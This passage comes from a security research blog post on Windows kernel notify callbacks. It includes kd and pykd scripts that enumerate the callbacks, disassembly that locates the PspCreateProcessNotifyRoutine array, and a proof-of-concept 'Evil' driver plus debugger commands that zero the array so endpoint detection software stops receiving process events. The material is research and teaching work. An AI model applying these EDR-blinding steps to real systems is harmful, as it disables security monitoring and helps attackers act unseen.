However, we don’t do “anything” in the OnImageLoadNotify function. Still, there’s an interesting gotcha worth mentioning. The FullImageName argument you can see above is optional, as noted by the SAL annotation. This means it can be NULL, and it doesn’t always produce the correct image file name. Microsoft is aware of this issue, and it can allegedly be abused to bypass some security systems. There are two really interesting posts about the root cause of this issue from Ensilo, here and here. There’s another, different issue with this callback that I might talk about in a different post.
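Since the callback does nothing yet, here is a hedged sketch of the defensive handling the _In_opt_ annotation calls for, written as a user-mode model. UnicodeStringModel is a stand-in I made up for UNICODE_STRING (same idea: Length counts bytes, and Buffer is not guaranteed to be NUL-terminated), and ImageNameOrPlaceholder is a hypothetical helper, not something from the driver.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Minimal stand-in for UNICODE_STRING: Length is in bytes, and Buffer is not
// guaranteed to end with a NUL character.
struct UnicodeStringModel {
    unsigned short Length;          // bytes currently used
    unsigned short MaximumLength;   // bytes allocated
    const wchar_t* Buffer;
};

// Never trusts the optional name: handles a null pointer, a null buffer and
// an empty string, and copies exactly Length bytes worth of characters.
std::wstring ImageNameOrPlaceholder(const UnicodeStringModel* name) {
    if (name == nullptr || name->Buffer == nullptr || name->Length == 0) {
        return L"<unknown image>";
    }
    const std::size_t chars = name->Length / sizeof(wchar_t);
    return std::wstring(name->Buffer, chars);
}
```

The same care applies to any string the kernel hands to a callback: treating Buffer as a C string (as wcsstr does) only works when a terminator happens to be there.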
Kernel Notify Callbacks Enumeration
As mentioned before, if we can set these callbacks… we can also remove them. If the callback is set by our driver it’s trivial to unset it. However, if we want to enumerate all the callbacks that exist on the system extra work is required.
We can use some kd scripting kung-fu and enumerate all the callbacks registered in the system easily.
KD (WinDbg) script
To look at the callbacks registered in the system we can use some debugging and automation scripts.
You can use the kd script below to list Process, Threads, and Image load callbacks. It’s not very robust in terms of error handling at the moment. Feel free to improve it. There are no dependencies, just some quick scripting with the Debugging Tools.
$$ displays a list of all registered process/thread creation and image load callbacks
$$ $$><C:\Users\rui\Desktop\windbg-scripts\psnotifycallbacks.wdb

r $t0 = dwo(nt!PspCreateProcessNotifyRoutineExCount)
r $t1 = dwo(nt!PspCreateProcessNotifyRoutineCount)
r $t3 = nt!PspCreateProcessNotifyRoutine
aS ${Total} (@$t0 + @$t1)
.block
{
    .printf "[+] Total of: %u CreateProcessNotifyRoutines\n", ${Total}
    .for (r $t4 = 0 ; $t4 < ${Total} ; r $t4 = @$t4 + 1)
    {
        r $t5 = poi(@$t3 + (@$ptrsize * @$t4))
        r $t5 = @@C++(@$t5 & (~0xf))
        r $t6 = (@$t5 + @$ptrsize)
        .printf "[%u] %y\n", @$t4, poi(@$t6)
    }
}
ad /q _sr_${Total};

r $t0 = dwo(nt!PspCreateThreadNotifyRoutineCount)
r $t1 = nt!PspCreateThreadNotifyRoutine
aS ${Total} @$t0
.block
{
    .printf "\n[+] Total of: %u CreateThreadNotifyRoutines\n", ${Total}
    .for (r $t4 = 0 ; $t4 < ${Total} ; r $t4 = @$t4 + 1)
    {
        r $t5 = poi(@$t1 + (@$ptrsize * @$t4))
        r $t5 = @@C++(@$t5 & (~0xf))
        r $t6 = (@$t5 + @$ptrsize)
        .printf "[%u] %y\n", @$t4, poi(@$t6)
    }
}
ad /q _sr_${Total};

r $t0 = dwo(nt!PspLoadImageNotifyRoutineCount)
r $t1 = nt!PspLoadImageNotifyRoutine
aS ${Total} (@$t0)
.block
{
    .printf "\n[+] Total of: %u CreateLoadImageRoutines\n", ${Total}
    .for (r $t4 = 0 ; $t4 < ${Total} ; r $t4 = @$t4 + 1)
    {
        r $t5 = poi(@$t1 + (@$ptrsize * @$t4))
        r $t5 = @@C++(@$t5 & (~0xf))
        r $t6 = (@$t5 + @$ptrsize)
        .printf "[%u] %y\n", @$t4, poi(@$t6)
    }
}
ad /q _sr_${Total};
ad /q *;
In case you aren’t familiar with Windows debugging scripting, here’s a brief description about what’s going on. As mentioned before, when a driver registers a process callback, the pointer to the callback is stored in an internal data structure. More precisely, an array of pointers (to those data structures). This is maintained in a global variable named nt!PspCreateProcessNotifyRoutine
. Yes, global variable!
Depending on the API, and Windows version, that was used to register the process callbacks, either one of the 2 counters is used:
nt!PspCreateProcessNotifyRoutineExCount nt!PspCreateProcessNotifyRoutineCount
These counters are incremented when a new callback is registered in the system.
The same happens for the thread and image load callbacks. So, we calculate the total number of callbacks and then iterate through the array of pointers to get the respective structures and display the symbol associated with each callback function pointer. If you aren’t getting symbols try using .reload
before running the script.
The $t0 to $t6 are the debugger’s pseudo-registers, used here as variables. The r command assigns a value to a register, which is why it starts every line that sets one. dwo is a MASM operator that reads a DWORD (a 32-bit value) from the given address. With aS we set an alias (named Total in the script above) to the sum of the registers $t0 and $t1.
.printf
, as I bet you can guess, is a control flow token and part of the debugging scripting language which can be used to format and display values from the debugger script.
Probably you can also guess what .for
is. Correct, another control flow token. poi
is a MASM
operator similar to dwo
but it is used to reference pointer size values.
@$ptrsize
is a pseudo register that is automatically set to 4, or 8, depending on the target system being debugged (a 32 or 64-bit system respectively).
For the debugger to process the &
and ~
operators, both part of the C++
language, we have to switch to the C++
expression evaluator using @@C++
. With ad we delete that alias so it doesn’t interfere with subsequent executions of the script.
Finally, to run the external script in the debugger:
$$><c:\path\to\script.wdb
Here’s the output of the execution of the script above in my system.
We can see all the notification callback routines registered by our pseudo-EDR driver. You might recognize some, and if you looked at these before you might even notice that one that’s usually here… is missing. Yes, I disabled Windows Defender in this system, so the WdFilter.sys
is missing. Good catch!
Python script
While the above is enough, because I like Python, based on this triplefault.io post I “hacked” the following Python script with Pykd that you can use to enumerate Process, Threads, and Image Load callbacks as well.
from pykd import *

version = getSystemVersion()

def ptr_size():
    if is64bitSystem():
        return 8
    else:
        return 4

def checkKernelDebugging():
    if not isKernelDebugging() and not isLocalKernelDebuggerEnabled():
        print("[-] Not running inside KD!")
        exit(1)

# load required module 'nt'
def loadNT():
    try:
        nt = module("nt")
    except:
        print("[-] Couldn't get the base address of 'ntoskrnl'.")
        exit(1)
    return nt

def fastref(_EX_FAST_REF):
    # discard last 4 bits of the pointer
    return ((_EX_FAST_REF >> 4) << 4)

def listCallbacks(CallbacksArray, ArraySize):
    PSIZE = ptr_size()
    for i in range(ArraySize):
        callback = (CallbacksArray + (i * PSIZE))
        try:
            callback = ptrPtr(callback)
        except:
            print(i)
            print(ArraySize)
            print("[-] Couldn't read memory!!")
            exit(1)
        # empty slot, nothing registered here
        if callback == 0:
            continue
        obj = fastref(callback)
        try:
            # the function pointer is one pointer size into the block
            apicall = ptrPtr(obj + (PSIZE))
        except:
            print("[-] Couldn't read memory!")
            exit(1)
        print("[{}] {:#x} ({})".format(i, apicall, findSymbol(apicall)))

def processCallbacks(nt):
    try:
        # read counters
        PspCreateProcessNotifyRoutineExCount = ptrDWord(nt.offset("PspCreateProcessNotifyRoutineExCount"))
        PspCreateProcessNotifyRoutineCount = ptrDWord(nt.offset("PspCreateProcessNotifyRoutineCount"))
        # get the address of the symbol PspCreateProcessNotifyRoutine
        PspCreateProcessNotifyRoutine = nt.offset("PspCreateProcessNotifyRoutine")
    except:
        print("[-] Couldn't read memory and/or load Symbols")
        exit(1)
    # if <= Windows 2003 https://www.gaijin.at/en/infos/windows-version-numbers
    if version.buildNumber <= 3790:
        num = PspCreateProcessNotifyRoutineCount
    else:
        num = PspCreateProcessNotifyRoutineExCount + PspCreateProcessNotifyRoutineCount
    print("[+] Total of: {} CreateProcessNotifyRoutines".format(num))
    listCallbacks(PspCreateProcessNotifyRoutine, num)

def threadCallbacks(nt):
    try:
        # counter
        PspCreateThreadNotifyRoutineCount = ptrDWord(nt.offset("PspCreateThreadNotifyRoutineCount"))
        # get the address of the symbol PspCreateThreadNotifyRoutine
        PspCreateThreadNotifyRoutine = nt.offset("PspCreateThreadNotifyRoutine")
    except:
        print("[-] Couldn't read memory and/or load Symbols")
        exit(1)
    if version.buildNumber >= 10240:
        num = PspCreateThreadNotifyRoutineCount + ptrDWord(nt.offset("PspCreateThreadNotifyRoutineNonSystemCount"))
    else:
        num = PspCreateThreadNotifyRoutineCount
    print("\n[+] Total of: {} CreateThreadNotifyRoutines".format(num))
    listCallbacks(PspCreateThreadNotifyRoutine, num)

def loadimageCallbacks(nt):
    try:
        # read counters
        PspLoadImageNotifyRoutineCount = ptrDWord(nt.offset("PspLoadImageNotifyRoutineCount"))
        # get the address of the symbol PspLoadImageNotifyRoutine
        PspLoadImageNotifyRoutine = nt.offset("PspLoadImageNotifyRoutine")
    except:
        print("[-] Couldn't read memory and/or load Symbols")
        exit(1)
    num = PspLoadImageNotifyRoutineCount
    print("\n[+] Total of: {} CreateLoadImageRoutines".format(num))
    listCallbacks(PspLoadImageNotifyRoutine, num)

if __name__ == '__main__':
    checkKernelDebugging()
    nt = loadNT()
    processCallbacks(nt)
    threadCallbacks(nt)
    loadimageCallbacks(nt)
To run it:
1: kd> .load pykd
1: kd> !py C:\Users\rui\desktop\tools\windbg-scripts\psnotifycallbacks.py
Here’s the output of its execution on my system.
SwishDbgExt
You can also use the SwishDbgExt WinDbg extension, which is pretty cool and will give you way more information. Just use the command !ms_callbacks
, see below.
If you fancy colours and buttons, use windbg
instead of kd
as above.
The PspCreateProcessNotifyRoutine array
The scripts above are all cool and pretty, but let’s see how to find this information “manually” without the help of these scripts. I advise you to read the code of the scripts above, because in the end what we’ll do step by step here, is what the scripts are doing with some extra lifting and error handling. We are going through this “manually” mainly because you’ll need to understand it if you later want to modify the source code of the Evil.sys
kernel driver (that we’ll talk about further down).
In this walkthrough, we’ll be using, as mentioned already, Windows 10 x64 1903 19H1 (OS Build 18362.592). I won’t mention 32-bit systems or other Windows versions below 10. You can look at them yourself if you like. I can tell you in advance that the process to identify these global arrays ( PspCreateProcessNotifyRoutine
, and PspCreateThreadNotifyRoutine
) is easier.
We start by disassembling the function PsSetCreateProcessNotifyRoutine
.
0: kd> u nt!PsSetCreateProcessNotifyRoutine
nt!PsSetCreateProcessNotifyRoutine:
fffff800`26f48b60 4883ec28 sub rsp,28h
fffff800`26f48b64 8ac2 mov al,dl
fffff800`26f48b66 33d2 xor edx,edx
fffff800`26f48b68 84c0 test al,al
fffff800`26f48b6a 0f95c2 setne dl
fffff800`26f48b6d e80e010000 call nt!PspSetCreateProcessNotifyRoutine (fffff800`26f48c80)
fffff800`26f48b72 4883c428 add rsp,28h
fffff800`26f48b76 c3 ret
Above, we can get the address of the function PspSetCreateProcessNotifyRoutine
. So we disassemble it too.
0: kd> u nt!PspSetCreateProcessNotifyRoutine
nt!PspSetCreateProcessNotifyRoutine:
fffff800`26f48c80 48895c2408 mov qword ptr [rsp+8],rbx
fffff800`26f48c85 48896c2410 mov qword ptr [rsp+10h],rbp
fffff800`26f48c8a 4889742418 mov qword ptr [rsp+18h],rsi
fffff800`26f48c8f 57 push rdi
fffff800`26f48c90 4154 push r12
fffff800`26f48c92 4155 push r13
fffff800`26f48c94 4156 push r14
fffff800`26f48c96 4157 push r15
0: kd> u
nt!PspSetCreateProcessNotifyRoutine+0x18:
fffff800`26f48c98 4883ec20 sub rsp,20h
fffff800`26f48c9c 8bf2 mov esi,edx
fffff800`26f48c9e 8bda mov ebx,edx
fffff800`26f48ca0 83e602 and esi,2
fffff800`26f48ca3 4c8bf1 mov r14,rcx
fffff800`26f48ca6 f6c201 test dl,1
fffff800`26f48ca9 0f8591520c00 jne nt!PspSetCreateProcessNotifyRoutine+0xc52c0 (fffff800`2700df40)
fffff800`26f48caf 85f6 test esi,esi
0: kd> u
nt!PspSetCreateProcessNotifyRoutine+0x31:
fffff800`26f48cb1 0f848c000000 je nt!PspSetCreateProcessNotifyRoutine+0xc3 (fffff800`26f48d43)
fffff800`26f48cb7 ba20000000 mov edx,20h
fffff800`26f48cbc e89f82a3ff call nt!MmVerifyCallbackFunctionCheckFlags (fffff800`26980f60)
fffff800`26f48cc1 85c0 test eax,eax
fffff800`26f48cc3 0f843a530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc5383 (fffff800`2700e003)
fffff800`26f48cc9 488bd3 mov rdx,rbx
fffff800`26f48ccc 498bce mov rcx,r14
fffff800`26f48ccf e8a4000000 call nt!ExAllocateCallBack (fffff800`26f48d78)
0: kd> u
nt!PspSetCreateProcessNotifyRoutine+0x54:
fffff800`26f48cd4 488bf8 mov rdi,rax
fffff800`26f48cd7 4885c0 test rax,rax
fffff800`26f48cda 0f842d530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc538d (fffff800`2700e00d)
fffff800`26f48ce0 33db xor ebx,ebx
fffff800`26f48ce2 4c8d2d77d3dbff lea r13,[nt!PspCreateProcessNotifyRoutine (fffff800`26d06060)]
fffff800`26f48ce9 488d0cdd00000000 lea rcx,[rbx*8]
fffff800`26f48cf1 4533c0 xor r8d,r8d
fffff800`26f48cf4 4903cd add rcx,r13
The first lea instruction we see gives us the global array we are interested in ( PspCreateProcessNotifyRoutine
). In this Windows version, the address is loaded into the register R13
. If you look into other Windows versions you can see it being loaded into R14
, R15
, or others. The same goes for the initial call
that led us to the PspSetCreateProcessNotifyRoutine
. In some Windows versions, you might find a jmp
instead. We’ll need to handle these cases in our Evil
driver.
Note: Since we only need to parse a few opcodes to find the instructions we are interested in, doing it manually is OK. If you want to do it properly look at Capstone or Zydis .
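The offset arithmetic behind those two steps can be sketched in a few lines of Python. This is only an illustration of the idea, not the code used by the Evil driver: the function names are made up for this example, the bytes are copied from the kd output above, and a naive byte scan like this one can match in the middle of another instruction (which is exactly why a real disassembler is the safer choice).

```python
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF

def find_call_target(code, base):
    """Target of the first `call rel32` (opcode E8) in `code`, or None."""
    for off in range(len(code) - 4):
        if code[off] == 0xE8:
            rel = struct.unpack_from("<i", code, off + 1)[0]
            # rel32 is relative to the end of the 5-byte instruction
            return (base + off + 5 + rel) & MASK64
    return None

def find_lea_rip_target(code, base):
    """Target of the first `lea r64, [rip+disp32]` in `code`, or None."""
    for off in range(len(code) - 6):
        rex, opcode, modrm = code[off], code[off + 1], code[off + 2]
        # REX.W (48) or REX.W+R (4C), opcode 8D, ModRM with mod=00 and rm=101
        if rex in (0x48, 0x4C) and opcode == 0x8D and (modrm & 0xC7) == 0x05:
            disp = struct.unpack_from("<i", code, off + 3)[0]
            # disp32 is relative to the end of the 7-byte instruction
            return (base + off + 7 + disp) & MASK64
    return None

# Bytes of nt!PsSetCreateProcessNotifyRoutine, from the first listing
ps_set = bytes.fromhex("4883ec28" "8ac2" "33d2" "84c0" "0f95c2"
                       "e80e010000" "4883c428" "c3")
# Bytes starting at fffff800`26f48ce0, from the last listing
psp_tail = bytes.fromhex("33db" "4c8d2d77d3dbff" "488d0cdd00000000")

print(hex(find_call_target(ps_set, 0xfffff80026f48b60)))
print(hex(find_lea_rip_target(psp_tail, 0xfffff80026f48ce0)))
```

The two printed values should match what kd resolved for us: the address of PspSetCreateProcessNotifyRoutine and the address of the PspCreateProcessNotifyRoutine array. Matching on the ModRM byte instead of a fixed register is what lets the same check cope with R13, R14, R15 or RCX being used.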
If we now display the contents of the array…
0: kd> dqs fffff800`26d06060
fffff800`26d06060 ffffcd0b`e2c5024f
fffff800`26d06068 ffffcd0b`e2dea2af
fffff800`26d06070 ffffcd0b`e486525f
fffff800`26d06078 ffffcd0b`e4865c1f
fffff800`26d06080 ffffcd0b`e486ccff
fffff800`26d06088 ffffcd0b`e486caef
fffff800`26d06090 ffffcd0b`e486d59f
fffff800`26d06098 ffffcd0b`e7722c1f
fffff800`26d060a0 ffffcd0b`e772696f
fffff800`26d060a8 ffffcd0b`e9e8a1cf
fffff800`26d060b0 00000000`00000000
fffff800`26d060b8 00000000`00000000
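Hmm, no symbol resolution? These values are not plain pointers: the low 4 bits of each entry are a reference count, and the function pointer sits one pointer size (8 bytes) into the structure the entry points to. Here every entry ends in 0xF, so we can AND the values we have in the array with 0xFFFFFFFFFFFFFFF8 and land directly on the function pointer (the scripts above do the more general thing: clear the low 4 bits, then add the pointer size). For example, for the last value of the array: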
0: kd> dps (ffffcd0b`e9e8a1cf & FFFFFFFFFFFFFFF8) L1
ffffcd0b`e9e8a1c8 fffff800`2c821720 edr!OnProcessNotify [c:\users\rui\source\repos\edr\edr\edr.cpp @ 158]
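If you want to convince yourself how that mask relates to what the scripts do, here is a small Python sketch. It assumes the x64 layout the scripts above rely on (low 4 bits are a reference count, function pointer at one pointer size into the block). The helper names are mine, and the sample values are taken from the dqs output above.

```python
PTR_SIZE = 8        # x64
REFCNT_MASK = 0xF   # low 4 bits of each array entry

def function_slot(entry):
    """Address that holds the callback function pointer (general form)."""
    block = entry & ~REFCNT_MASK   # start of the callback block
    return block + PTR_SIZE        # the function pointer is the second field

def shortcut(entry):
    """The single AND used in the kd command above."""
    return entry & 0xFFFFFFFFFFFFFFF8

entries = [0xffffcd0be2c5024f, 0xffffcd0be2dea2af, 0xffffcd0be9e8a1cf]
for entry in entries:
    print(hex(function_slot(entry)), hex(shortcut(entry)))

# A made-up entry whose reference count is 7 instead of 0xF:
odd = 0xffffcd0be9e8a1c7
print(hex(function_slot(odd)), hex(shortcut(odd)))
```

For the entries in the dump both forms agree, because bit 3 of the reference count is set and survives the AND. For the made-up entry the shortcut lands on the start of the block instead, so if you automate this, clear the 4 bits and add the pointer size.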
For now, that’s all we need to know. We’ll talk about these “signatures”, which we have to parse in our Evil driver to find the kernel structures we are interested in, further down.
The PspCreateThreadNotifyRoutine array
The process to find the PspCreateThreadNotifyRoutine
is pretty much the same as for PspCreateProcessNotifyRoutine
. Since our proof-of-concept Evil driver doesn’t care about threads I’ll just list here the kd
output for the same Windows version as described above.
0: kd> u nt!PsSetCreateThreadNotifyRoutine
nt!PsSetCreateThreadNotifyRoutine:
fffff806`4c748940 4883ec28 sub rsp,28h
fffff806`4c748944 33d2 xor edx,edx
fffff806`4c748946 e865000000 call nt!PspSetCreateThreadNotifyRoutine (fffff806`4c7489b0)
fffff806`4c74894b 4883c428 add rsp,28h
fffff806`4c74894f c3 ret
fffff806`4c748950 cc int 3
fffff806`4c748951 cc int 3
fffff806`4c748952 cc int 3
0: kd> u nt!PspSetCreateThreadNotifyRoutine
nt!PspSetCreateThreadNotifyRoutine:
fffff806`4c7489b0 48895c2408 mov qword ptr [rsp+8],rbx
fffff806`4c7489b5 4889742410 mov qword ptr [rsp+10h],rsi
fffff806`4c7489ba 57 push rdi
fffff806`4c7489bb 4883ec20 sub rsp,20h
fffff806`4c7489bf 8bf2 mov esi,edx
fffff806`4c7489c1 8bd2 mov edx,edx
fffff806`4c7489c3 e8b0030000 call nt!ExAllocateCallBack (fffff806`4c748d78)
fffff806`4c7489c8 488bf8 mov rdi,rax
0: kd> u
nt!PspSetCreateThreadNotifyRoutine+0x1b:
fffff806`4c7489cb 4885c0 test rax,rax
fffff806`4c7489ce 0f840e550c00 je nt!PspSetCreateThreadNotifyRoutine+0xc5532 (fffff806`4c80dee2)
fffff806`4c7489d4 33db xor ebx,ebx
fffff806`4c7489d6 488d0d83d2dbff lea rcx,[nt!PspCreateThreadNotifyRoutine (fffff806`4c505c60)]
fffff806`4c7489dd 4533c0 xor r8d,r8d
fffff806`4c7489e0 488d0cd9 lea rcx,[rcx+rbx*8]
fffff806`4c7489e4 488bd7 mov rdx,rdi
fffff806`4c7489e7 e8b084a3ff call nt!ExCompareExchangeCallBack (fffff806`4c180e9c)
We decode the function addresses the same way.
0: kd> dqs fffff806`4c505c60
fffff806`4c505c60 ffff8882`ac745c8f
fffff806`4c505c68 ffff8882`ac702a0f
fffff806`4c505c70 00000000`00000000
fffff806`4c505c78 00000000`00000000
(...)
0: kd> dps (ffff8882`ac702a0f & FFFFFFFFFFFFFFF8) L1
ffff8882`ac702a08 fffff806`52481a20 edr!OnThreadNotify
As I said in the beginning, and as you can see, all these Ps notify callbacks “work” more or less the same way.
Evil Kernel Mode Driver
What’s this Evil
kernel driver about after all? We asked ourselves before what happens if we zero out these global arrays where the addresses of our notification callbacks are stored. Also, we said that if we can set notification callbacks we can also unset them. Right?
Right. We can simply try it with the debugger. We don’t need to write a kernel driver to find out. For example, if we want to zero out the entry for our EDR we can simply do:
0: kd> dqs fffff800`26d06060
fffff800`26d06060 ffffcd0b`e2c5024f
fffff800`26d06068 ffffcd0b`e2dea2af
fffff800`26d06070 ffffcd0b`e486525f
fffff800`26d06078 ffffcd0b`e4865c1f
fffff800`26d06080 ffffcd0b`e486ccff
fffff800`26d06088 ffffcd0b`e486caef
fffff800`26d06090 ffffcd0b`e486d59f
fffff800`26d06098 ffffcd0b`e7722c1f
fffff800`26d060a0 ffffcd0b`e772696f
fffff800`26d060a8 ffffcd0b`e9e8a1cf
fffff800`26d060b0 00000000`00000000
0: kd> eq fffff800`26d060a8 0
0: kd> dqs fffff800`26d06060
fffff800`26d06060 ffffcd0b`e2c5024f
fffff800`26d06068 ffffcd0b`e2dea2af
fffff800`26d06070 ffffcd0b`e486525f
fffff800`26d06078 ffffcd0b`e4865c1f
fffff800`26d06080 ffffcd0b`e486ccff
fffff800`26d06088 ffffcd0b`e486caef
fffff800`26d06090 ffffcd0b`e486d59f
fffff800`26d06098 ffffcd0b`e7722c1f
fffff800`26d060a0 ffffcd0b`e772696f
fffff800`26d060a8 00000000`00000000
fffff800`26d060b0 00000000`00000000
As simple as that. And from now on… our EDR won’t receive any more process creation/termination notifications. From an attacker’s perspective, using kd
is not realistic in an attack scenario for many obvious reasons.
What if we have a kernel driver that does exactly this for us, and a few other things? Let’s see what this Evil
driver is about. Build the driver with Debug mode enabled, load it with sc.exe
, and run its user-mode client too to find out which options are available.
sc create evil type= kernel binPath= c:\users\rui\desktop\evil.sys
sc start evil
As we can see from above, there are multiple things we can do with the Evil
driver user-mode client.
These “special” modes are just parody, but let’s go through each one of them.
First, we use our Evil
driver user-mode client to list all the process creation/termination notification callbacks registered in the system.
How is this achieved? I use the AuxKlibQueryModuleInformation to retrieve information about all the image modules that the system has loaded. You can have a look at the function SearchModules
inside the evil.cpp
file. It’s a slightly modified version of the DisplayModules
function that you can find in the same file. You can also call this DisplayModules
function from the evilcli.exe
with the “undocumented” -m
switch.
NTSTATUS DisplayModules()
{
    auto status = STATUS_SUCCESS;
    ULONG modulesSize;
    AUX_MODULE_EXTENDED_INFO* modules;
    ULONG numberOfModules, i;

    status = AuxKlibInitialize();
    if (!NT_SUCCESS(status))
    {
        KdPrint(("AuxKlibInitialize fail %d\n", status));
        return status;
    }

    // Get the required array size.
    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL);
    if (!NT_SUCCESS(status) || modulesSize == 0)
    {
        return status;
    }

    // Calculate the number of modules.
    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    // Allocate memory to receive data.
    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == NULL)
    {
        status = STATUS_INSUFFICIENT_RESOURCES;
        return status;
    }
    RtlZeroMemory(modules, modulesSize);

    // Obtain the module information.
    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status))
    {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    KdPrint(("[ # ] ImageBase\t\t\tImageSize\t\t\t\t\t\t FileName FullPathName\n"));
    for (i = 0; i < numberOfModules; i++)
    {
        KdPrint(("[%03d] %p\t", i, modules[i].BasicInfo.ImageBase)); // ImageBase
        KdPrint(("0x%08x\t", modules[i].ImageSize)); // ImageSize
        KdPrint(("%30s ", modules[i].FullPathName + modules[i].FileNameOffset)); // FileName
        KdPrint((" %s\n", modules[i].FullPathName)); // FullPathName
    }

    ExFreePoolWithTag(modules, DRIVER_TAG);
    return status;
}
If you use the -m
switch ( evilcli.exe -m
) you won’t see the output in user-mode (there are other ways of getting the same information from a medium integrity process as we’ll see later). However, if you have your kernel debugger attached you’ll see the following.
This -m
switch is just for my own debugging. However, you can see that with this information at hand it’s trivial to find out to which module each one of the global array values belongs. Look at the SearchModules
function for details.
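The lookup itself is just a range check against each module’s base and size. Here’s a rough Python sketch of that idea, not the actual SearchModules code: the Module tuple and find_module are names I made up, the image sizes are hypothetical, and the address is the EDR callback that shows up later in this post as edr.sys + 0x1720.

```python
from collections import namedtuple

# Mirrors the fields DisplayModules prints: ImageBase, ImageSize, FileName
Module = namedtuple("Module", "base size name")

def find_module(modules, address):
    """Return (module name, offset) for the module that contains address."""
    for m in modules:
        if m.base <= address < m.base + m.size:
            return m.name, address - m.base
    return None

modules = [
    Module(0xfffff80702000000, 0x200000, "example.sys"),  # hypothetical entry
    Module(0xfffff807027b0000, 0x10000, "edr.sys"),       # size is hypothetical
]

hit = find_module(modules, 0xfffff807027b1720)
print(hit[0], hex(hit[1]))
```

Anything that doesn’t fall inside a loaded image comes back as None, which is worth flagging on its own because a callback pointing outside every known module is suspicious.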
Let’s look at the -z
switch now. Zero out Process Notify Callback’s Array (Cowboy Mode) . Let’s start by locating the array, as we did before.
0: kd> u nt!PsSetCreateProcessNotifyRoutine
nt!PsSetCreateProcessNotifyRoutine:
fffff806`4c748b60 4883ec28 sub rsp,28h
fffff806`4c748b64 8ac2 mov al,dl
fffff806`4c748b66 33d2 xor edx,edx
fffff806`4c748b68 84c0 test al,al
fffff806`4c748b6a 0f95c2 setne dl
fffff806`4c748b6d e80e010000 call nt!PspSetCreateProcessNotifyRoutine (fffff806`4c748c80)
fffff806`4c748b72 4883c428 add rsp,28h
fffff806`4c748b76 c3 ret
0: kd> u nt!PspSetCreateProcessNotifyRoutine
nt!PspSetCreateProcessNotifyRoutine:
fffff806`4c748c80 48895c2408 mov qword ptr [rsp+8],rbx
fffff806`4c748c85 48896c2410 mov qword ptr [rsp+10h],rbp
fffff806`4c748c8a 4889742418 mov qword ptr [rsp+18h],rsi
fffff806`4c748c8f 57 push rdi
fffff806`4c748c90 4154 push r12
fffff806`4c748c92 4155 push r13
fffff806`4c748c94 4156 push r14
fffff806`4c748c96 4157 push r15
0: kd> u
nt!PspSetCreateProcessNotifyRoutine+0x18:
fffff806`4c748c98 4883ec20 sub rsp,20h
fffff806`4c748c9c 8bf2 mov esi,edx
fffff806`4c748c9e 8bda mov ebx,edx
fffff806`4c748ca0 83e602 and esi,2
fffff806`4c748ca3 4c8bf1 mov r14,rcx
fffff806`4c748ca6 f6c201 test dl,1
fffff806`4c748ca9 0f8591520c00 jne nt!PspSetCreateProcessNotifyRoutine+0xc52c0 (fffff806`4c80df40)
fffff806`4c748caf 85f6 test esi,esi
0: kd> u
nt!PspSetCreateProcessNotifyRoutine+0x31:
fffff806`4c748cb1 0f848c000000 je nt!PspSetCreateProcessNotifyRoutine+0xc3 (fffff806`4c748d43)
fffff806`4c748cb7 ba20000000 mov edx,20h
fffff806`4c748cbc e89f82a3ff call nt!MmVerifyCallbackFunctionCheckFlags (fffff806`4c180f60)
fffff806`4c748cc1 85c0 test eax,eax
fffff806`4c748cc3 0f843a530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc5383 (fffff806`4c80e003)
fffff806`4c748cc9 488bd3 mov rdx,rbx
fffff806`4c748ccc 498bce mov rcx,r14
fffff806`4c748ccf e8a4000000 call nt!ExAllocateCallBack (fffff806`4c748d78)
0: kd> u
nt!PspSetCreateProcessNotifyRoutine+0x54:
fffff806`4c748cd4 488bf8 mov rdi,rax
fffff806`4c748cd7 4885c0 test rax,rax
fffff806`4c748cda 0f842d530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc538d (fffff806`4c80e00d)
fffff806`4c748ce0 33db xor ebx,ebx
fffff806`4c748ce2 4c8d2d77d3dbff lea r13,[nt!PspCreateProcessNotifyRoutine (fffff806`4c506060)]
fffff806`4c748ce9 488d0cdd00000000 lea rcx,[rbx*8]
fffff806`4c748cf1 4533c0 xor r8d,r8d
fffff806`4c748cf4 4903cd add rcx,r13
0: kd> dqs fffff806`4c506060
fffff806`4c506060 ffff8882`a7c5006f
fffff806`4c506068 ffff8882`a7e640ff
fffff806`4c506070 ffff8882`a9b8a73f
fffff806`4c506078 ffff8882`a9b8aaff
fffff806`4c506080 ffff8882`a9b91abf
fffff806`4c506088 ffff8882`a9b91c9f
fffff806`4c506090 ffff8882`a9b92b0f
fffff806`4c506098 ffff8882`a9b9562f
fffff806`4c5060a0 ffff8882`ac745d1f
fffff806`4c5060a8 ffff8882`ac702d0f
fffff806`4c5060b0 00000000`00000000
fffff806`4c5060b8 00000000`00000000
fffff806`4c5060c0 00000000`00000000
fffff806`4c5060c8 00000000`00000000
fffff806`4c5060d0 00000000`00000000
fffff806`4c5060d8 00000000`00000000
So we have our array at fffff8064c506060
. If we now run our evilcli.exe
with the -z
switch this array should be completely zero’ed out.
We should see the following in our debugger.
These are just debug messages, but it means basically that we successfully found what we were looking for. The logic is implemented in the function FindPspCreateProcessNotifyRoutine
, look at the source code. Again, if you want to do a proper job, use Capstone or Zydis as I mentioned before. For a few instructions like in this case, it is fine to parse the memory ourselves and search for the opcodes we are interested in.
Anyway, if we look at the array address again…
0: kd> dqs fffff806`4c506060
fffff806`4c506060 00000000`00000000
fffff806`4c506068 00000000`00000000
fffff806`4c506070 00000000`00000000
fffff806`4c506078 00000000`00000000
fffff806`4c506080 00000000`00000000
fffff806`4c506088 00000000`00000000
fffff806`4c506090 00000000`00000000
fffff806`4c506098 00000000`00000000
fffff806`4c5060a0 00000000`00000000
fffff806`4c5060a8 00000000`00000000
fffff806`4c5060b0 00000000`00000000
fffff806`4c5060b8 00000000`00000000
fffff806`4c5060c0 00000000`00000000
fffff806`4c5060c8 00000000`00000000
fffff806`4c5060d0 00000000`00000000
fffff806`4c5060d8 00000000`00000000
